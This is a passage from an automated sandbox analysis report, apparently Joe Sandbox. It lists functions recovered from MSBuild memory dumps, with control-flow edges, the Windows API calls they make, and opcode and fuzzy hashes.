                                                                                                                              • Instruction ID: 41cb3a223cdf63b5280e010492cbce64cc7c1f7c8ded46e8190ad472ac22863e
                                                                                                                              • Opcode Fuzzy Hash: 5b001a8c9f4a8cf1a838e1549a433911958815140e60c98c3cd18e085cca3a83
                                                                                                                              • Instruction Fuzzy Hash: 4451ADB1D143499FDF14CFA9C884ADEBBF5BF88354F24812AE819AB210D7719945CF90
                                                                                                                              Function 00A94DCC Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 383 a94dcc-a97996 386 a97998-a9799e 383->386 387 a979a1-a979a8 383->387 386->387 388 a979aa-a979b0 387->388 389 a979b3-a97a52 CreateWindowExW 387->389 388->389 391 a97a5b-a97a93 389->391 392 a97a54-a97a5a 389->392 396 a97aa0 391->396 397 a97a95-a97a98 391->397 392->391 398 a97aa1 396->398 397->396 398->398
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00A97A42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 166b7317040344b13d55b648d82eef5d86fb12603af3584fbc323c7621065888
                                                                                                                              • Instruction ID: c064f0104fc263ff46bac06703ecc8abc9d5b09aca8d68297d2847031b780cf3
                                                                                                                              • Opcode Fuzzy Hash: 166b7317040344b13d55b648d82eef5d86fb12603af3584fbc323c7621065888
                                                                                                                              • Instruction Fuzzy Hash: AC519DB1D14349AFDF14CF99C884ADEBBF5BF88310F24852AE819AB210D775A945CF90
                                                                                                                              Function 00A94F1C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 399 a94f1c-a9a0ac 402 a9a15c-a9a17c call a94df4 399->402 403 a9a0b2-a9a0b7 399->403 412 a9a17f-a9a18c 402->412 405 a9a0b9-a9a0f0 403->405 406 a9a10a-a9a142 CallWindowProcW 403->406 413 a9a0f9-a9a108 405->413 414 a9a0f2-a9a0f8 405->414 407 a9a14b-a9a15a 406->407 408 a9a144-a9a14a 406->408 407->412 408->407 413->412 414->413
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00A9A131
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              • Opcode ID: 97fb6b077957b524b5e4273a1534134f60c944fe4353c718bd4035768feca60c
                                                                                                                              • Instruction ID: ece9697a5fd9f2dc31e45c29e46ae9fe7c349df0708f1e4ffd437c6cba4705e3
                                                                                                                              • Opcode Fuzzy Hash: 97fb6b077957b524b5e4273a1534134f60c944fe4353c718bd4035768feca60c
                                                                                                                              • Instruction Fuzzy Hash: 04411AB8A00305CFDB14CF99C848AAABBF5FF98314F24C559E519AB321D774A841CFA1
                                                                                                                              Function 00A9C651 Relevance: 1.6, APIs: 1, Instructions: 72comCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 416 a9c651-a9c655 417 a9c601-a9c603 416->417 418 a9c657-a9c6c6 416->418 420 a9c609-a9c61a OleInitialize 417->420 423 a9c6c8-a9c6ce 418->423 424 a9c6cf-a9c6e3 418->424 421 a9c61c-a9c622 420->421 422 a9c623-a9c640 420->422 421->422 423->424
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00A9C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              • Opcode ID: d5dfa311e05752ffa2889c69bbc88f3b434f96a2e167de9abe65b5b282d29041
                                                                                                                              • Instruction ID: 4cd8e600c6c02bdc6a296ae595fbf7e91cb3921a8f8e21edc1ada850098a86d5
                                                                                                                              • Opcode Fuzzy Hash: d5dfa311e05752ffa2889c69bbc88f3b434f96a2e167de9abe65b5b282d29041
                                                                                                                              • Instruction Fuzzy Hash: CF2177B2D006098FDB20DF9AD4447CEFBF4EF88324F24841AD559A7210C378A545CFA1
                                                                                                                              Function 00A94C14 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 428 a94c14-a95980 430 a95988-a959b3 GetModuleHandleW 428->430 431 a95982-a95985 428->431 432 a959bc-a959d0 430->432 433 a959b5-a959bb 430->433 431->430 433->432
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00A9576C), ref: 00A959A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: eed1bdc803d98c3ab442b96a264ed1efc2654ce87e1534f590208f48ed852716
                                                                                                                              • Instruction ID: 360cf1d961f1d11ed854e7a3e6d79750810717f3dca7b897bc46221d0a5eace0
                                                                                                                              • Opcode Fuzzy Hash: eed1bdc803d98c3ab442b96a264ed1efc2654ce87e1534f590208f48ed852716
                                                                                                                              • Instruction Fuzzy Hash: 6711F0B5D00649CFDB10CFAAC444ADEFBF4AB88324F10841AD959A7310D375A945CFA5
                                                                                                                              Function 00A9C5B0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 441 a9c5b0-a9c61a OleInitialize 442 a9c61c-a9c622 441->442 443 a9c623-a9c640 441->443 442->443
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00A9C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              • Opcode ID: ba488b2675af770f8d13ad8d659de780ff6cc4e9c5354392639049ad55891f1d
                                                                                                                              • Instruction ID: a3c192e2c0c9cda7463bb183e9225e14597a96ad34f5ba92c07e6a5a93b98575
                                                                                                                              • Opcode Fuzzy Hash: ba488b2675af770f8d13ad8d659de780ff6cc4e9c5354392639049ad55891f1d
                                                                                                                              • Instruction Fuzzy Hash: 2B1112B19007498FDB20DF9AD444BDEFBF4EB48324F208419D558A7310C379A944CFA5
                                                                                                                              Function 00A9B720 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 435 a9b720-a9c61a OleInitialize 437 a9c61c-a9c622 435->437 438 a9c623-a9c640 435->438 437->438
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00A9C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              • Opcode ID: e5288e275f474d1fecf0adf7d78558787b9cf0b9f23529b42faab24ba74a5b6c
                                                                                                                              • Instruction ID: 18580a9ab7782d9c03485374d6bce2167b482ea2b8e92946792ac5d018daa082
                                                                                                                              • Opcode Fuzzy Hash: e5288e275f474d1fecf0adf7d78558787b9cf0b9f23529b42faab24ba74a5b6c
                                                                                                                              • Instruction Fuzzy Hash: D91103B59007498FDB20DF9AD444BDEBBF4EB48324F208459E519A7310D374A944CFA5
                                                                                                                              Function 00CBE018 Relevance: .6, Instructions: 647COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fa859c79ed2dd91d4ff91d27b99e357d6f6b87d249789b6d03e288844aa28a69
                                                                                                                              • Instruction ID: 3a237a11347279b4d4ea8bea4fbddee12d0d8e010224203eacb6114a366e3fb1
                                                                                                                              • Opcode Fuzzy Hash: fa859c79ed2dd91d4ff91d27b99e357d6f6b87d249789b6d03e288844aa28a69
                                                                                                                              • Instruction Fuzzy Hash: 5A1295758B1257CFA2646B61E6EC62FBA61FB1F323704FC00F15AC09499F7014AD8A66
                                                                                                                              Function 00CBE017 Relevance: .6, Instructions: 647COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bf76718a49ce629010ee375338b7cecb25b4126cdf78edc39d465c9053b38ebe
                                                                                                                              • Instruction ID: 6e34d330ebb322724facc2bd84faa46307b1644f7c9ae87c8acffdbe06bb9233
                                                                                                                              • Opcode Fuzzy Hash: bf76718a49ce629010ee375338b7cecb25b4126cdf78edc39d465c9053b38ebe
                                                                                                                              • Instruction Fuzzy Hash: 0C1295758B1257CFA2646B61E6EC62FBA60FB1F323704FC00F15A809499F7014AD8A66
                                                                                                                              Function 00CB0C9F Relevance: .5, Instructions: 539COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 71e063e7825d23d4970d913754bf26d29d880fe9d87bc98e8966096a24281e12
                                                                                                                              • Instruction ID: c898898df999f7bffa9f81fbaf8006ae7629b37d0fb9435172b24df4c39848a8
                                                                                                                              • Opcode Fuzzy Hash: 71e063e7825d23d4970d913754bf26d29d880fe9d87bc98e8966096a24281e12
                                                                                                                              • Instruction Fuzzy Hash: 9B521C78901619CFCB54EF24E984B8EBBB2FB88301F1085E9D509A7768DB706E95CF40
                                                                                                                              Function 00CB0CA0 Relevance: .5, Instructions: 539COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3c51d8ae98ba2d0ea9afc6265b7280e2e4be8f477624733e55be095263085a92
                                                                                                                              • Instruction ID: a48ea2b17395290aca9a9aa71c26316ff736179c5fd2a8a19a12c903469f971f
                                                                                                                              • Opcode Fuzzy Hash: 3c51d8ae98ba2d0ea9afc6265b7280e2e4be8f477624733e55be095263085a92
                                                                                                                              • Instruction Fuzzy Hash: 5E520C78901619CFCB54EF64E984B8EBBB2FB88301F1085E9D509A7768DB706E95CF40
                                                                                                                              Function 00CB76F1 Relevance: .5, Instructions: 454COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a84b1b13e66f72dc7cc4c17f5678951569071133b367a773df51eba413ef654a
                                                                                                                              • Instruction ID: a8821f1b8acd250d1b2f9269d44afc301c5c701834d28977d4d3ae068a7585b8
                                                                                                                              • Opcode Fuzzy Hash: a84b1b13e66f72dc7cc4c17f5678951569071133b367a773df51eba413ef654a
                                                                                                                              • Instruction Fuzzy Hash: E4124A30A04249CFCB15CF69D884AEEBBF1EF89314F158699E815AB3A1DB31ED41CB50
                                                                                                                              Function 00CB5F38 Relevance: .3, Instructions: 267COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d44b05fcbfcc8ba317cb8ee8c8c0fdc3d9ba6b0669cab9a3f1cb7e6bdc31b8ca
                                                                                                                              • Instruction ID: 2ada59699e3c0fbe2fe9590dfcb57f03b675f1f86486297166d517ab3e97abe8
                                                                                                                              • Opcode Fuzzy Hash: d44b05fcbfcc8ba317cb8ee8c8c0fdc3d9ba6b0669cab9a3f1cb7e6bdc31b8ca
                                                                                                                              • Instruction Fuzzy Hash: D491CE70704201CFDB15AF69D894BBE7BE2AB88304F148869E4168B396DF388E46D795
                                                                                                                              Function 00CB6498 Relevance: .2, Instructions: 230COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 95f056a3206dada3d127b174ec712f2ae7c6076806aadd247bb9ad1ae88da253
                                                                                                                              • Instruction ID: 156b703f3c322d7600355f98f5a0e7b9801b97708062e91a568a224eb005e32b
                                                                                                                              • Opcode Fuzzy Hash: 95f056a3206dada3d127b174ec712f2ae7c6076806aadd247bb9ad1ae88da253
                                                                                                                              • Instruction Fuzzy Hash: D6819C34B00505DFCB24CF69C4849EABBB2BF89304F258169E416EB365DB39EC45CBA1
                                                                                                                              Function 00CB80D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b4ea97ee0e0be3d1f10ce80aa42d4ea0c90c7e1fadf32470444497c2660e91f1
                                                                                                                              • Instruction ID: ab1edf69ba727f88733e0825780a4a44aa1d241cbc426713400848cbe589c52a
                                                                                                                              • Opcode Fuzzy Hash: b4ea97ee0e0be3d1f10ce80aa42d4ea0c90c7e1fadf32470444497c2660e91f1
                                                                                                                              • Instruction Fuzzy Hash: 537135347006058FCB15DF69C888AAE7BEAAF99700F1540A9E826DB3B1DF70DD45CB51
                                                                                                                              Function 00CBFDBA Relevance: .1, Instructions: 137COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b9d967a4c8bdc98171891399dc398a4e86e7400390b369a795f891a106d76f3d
                                                                                                                              • Instruction ID: d23aeef622c59d5fe4a5eed1bc10ce9bd2d46ffd94f97e93fca4c865b25b4f73
                                                                                                                              • Opcode Fuzzy Hash: b9d967a4c8bdc98171891399dc398a4e86e7400390b369a795f891a106d76f3d
                                                                                                                              • Instruction Fuzzy Hash: 3F510F74D05248CFDB04DFA9D8846EDBBF1BF49301F24852AE855AB3A5DB349A06CF50
                                                                                                                              Function 00CB419F Relevance: .1, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 436c1c31723f8a8605be70f457f198804ffae2644c3265789efd24d278518dea
                                                                                                                              • Instruction ID: c1012dc700c56d47b76c9ac9e6615b181ea5ca1ab155d48845ec98b8142fafd3
                                                                                                                              • Opcode Fuzzy Hash: 436c1c31723f8a8605be70f457f198804ffae2644c3265789efd24d278518dea
                                                                                                                              • Instruction Fuzzy Hash: 3E518274E01208CFCB48DFA9D59499DBBF2FF89310B209569E809AB365DB35A942CF50
                                                                                                                              Function 00CB41A0 Relevance: .1, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cda352845e843f4e76f57d06fa7bb7339f4d132b9be3a2f52a8774152a2c149d
                                                                                                                              • Instruction ID: c519a5c67eb47c577dd3397fcb4a20130bc64c217f51c46447bad548d660f268
                                                                                                                              • Opcode Fuzzy Hash: cda352845e843f4e76f57d06fa7bb7339f4d132b9be3a2f52a8774152a2c149d
                                                                                                                              • Instruction Fuzzy Hash: 7B518274E01208CFCB48DFA9D59499DBBF2FF89310B209469E809AB365DB35A942CF50
                                                                                                                              Function 00CBD557 Relevance: .1, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: be24f2bc3a4064eb8586ae2a0e5f0fa29e5e746dd635ee3320593b360e5d6027
                                                                                                                              • Instruction ID: c9c3b7b5f0d0f44bdcaf05bad85e9943c0a5d8fef20fe3160d012c7cf83c7f65
                                                                                                                              • Opcode Fuzzy Hash: be24f2bc3a4064eb8586ae2a0e5f0fa29e5e746dd635ee3320593b360e5d6027
                                                                                                                              • Instruction Fuzzy Hash: 47518474E01208DFDB58DFAAD5849DDBBF2BF89300F209169E819AB365DB319945CF10
                                                                                                                              Function 00CBA303 Relevance: .1, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 129254e23403c145ff3d32626b17d2f3a93667b0bbca8f7a7cb62560d5a1dd71
                                                                                                                              • Instruction ID: df932315435bf4298a40b03eb5a8abfa195d2ae77220cc40f1e009caa01da2bc
                                                                                                                              • Opcode Fuzzy Hash: 129254e23403c145ff3d32626b17d2f3a93667b0bbca8f7a7cb62560d5a1dd71
                                                                                                                              • Instruction Fuzzy Hash: 9A41AF31A04249DFCF11CFA8C884ADDBFB2AF49310F148556E9959B2A1D370DE14CF62
                                                                                                                              Function 00CB3CC0 Relevance: .1, Instructions: 112COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 93ba1d42e5975e8170eecf0fd28cc33c5848c38b329c2c658945062c97ee0bbe
                                                                                                                              • Instruction ID: b30a18bfafeaea98562168af7c86d77a78b79353215116f8f4ff7f4f3ff6b00a
                                                                                                                              • Opcode Fuzzy Hash: 93ba1d42e5975e8170eecf0fd28cc33c5848c38b329c2c658945062c97ee0bbe
                                                                                                                              • Instruction Fuzzy Hash: EC310731B102A58BDF1C46BA88942FEBAAAABC4300F244439D916D3394DF74CF4597A1
                                                                                                                              Function 00CB9C30 Relevance: .1, Instructions: 105COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 742b32d3bd92f05f12aa1634a05e8285cac701d8bf1e735cd3919040b4868179
                                                                                                                              • Instruction ID: 5d7308b8aa99e4490cadc87bbd963b35e1471ad4b5192b2173150ce58d8e8f6e
                                                                                                                              • Opcode Fuzzy Hash: 742b32d3bd92f05f12aa1634a05e8285cac701d8bf1e735cd3919040b4868179
                                                                                                                              • Instruction Fuzzy Hash: CC419130704245CFDB01DF6AC884BAB7BE6EF89301F548866EA18CB2A6D775DD05CB91
                                                                                                                              Function 00CB8EF8 Relevance: .1, Instructions: 104COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c19c3c8434b5f4b1fc14811539a3d883d1cedeed2f8ddff612080022c440809c
                                                                                                                              • Instruction ID: 29be8d5496e91213a03b6b7d3a00c164e4eea30fe133559f61acc2533aad082f
                                                                                                                              • Opcode Fuzzy Hash: c19c3c8434b5f4b1fc14811539a3d883d1cedeed2f8ddff612080022c440809c
                                                                                                                              • Instruction Fuzzy Hash: 3E31E430304141CFDB259BA9D8906BE7B6FAF85700F2448AAF022CB292EF39CD49C755
                                                                                                                              Function 00CB5658 Relevance: .1, Instructions: 101COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f25fa2a58873fc6faee596b213e896edefd4982a2b78403dc7264eb9fbbf78ea
                                                                                                                              • Instruction ID: 03971125fd8f3b0dedd973c3a56fc1bf490cc7af1061ef74e014a80c624e365d
                                                                                                                              • Opcode Fuzzy Hash: f25fa2a58873fc6faee596b213e896edefd4982a2b78403dc7264eb9fbbf78ea
                                                                                                                              • Instruction Fuzzy Hash: B1319D71701649DFCB019F64D894AAF3BB2EB88314F008464F91597384DB35CEA5EBA0
                                                                                                                              Function 00CBAFD7 Relevance: .1, Instructions: 99COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 00ebddbc754b4f4d4f97849d935bbdca4df4c00a1dc497ba19845d507b66debf
                                                                                                                              • Instruction ID: 7ac85f79b466b49f2c84854c441f6cb916b8906661db028b1cff5b059604cdb2
                                                                                                                              • Opcode Fuzzy Hash: 00ebddbc754b4f4d4f97849d935bbdca4df4c00a1dc497ba19845d507b66debf
                                                                                                                              • Instruction Fuzzy Hash: 502157B1B043519FCB0667B998101FE7FF2ABD9321B5484AAE515C73D2DE248C0A83A6
                                                                                                                              Function 00CB8EB3 Relevance: .1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e616b738d0e28a8739c5a46c5e1599186679db13f1cbbcf5eb5bb9dd805aec5d
                                                                                                                              • Instruction ID: 1a3912dcb6f43d2c4167437a977208dbe811a76ba72c5cb1077b6ed352ccc300
                                                                                                                              • Opcode Fuzzy Hash: e616b738d0e28a8739c5a46c5e1599186679db13f1cbbcf5eb5bb9dd805aec5d
                                                                                                                              • Instruction Fuzzy Hash: D431C63590025CDFEB24EBA4C810BDEB77AEF85300F1081AAD50A77352CE35DE95AB65
                                                                                                                              Function 00CB8370 Relevance: .1, Instructions: 90COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
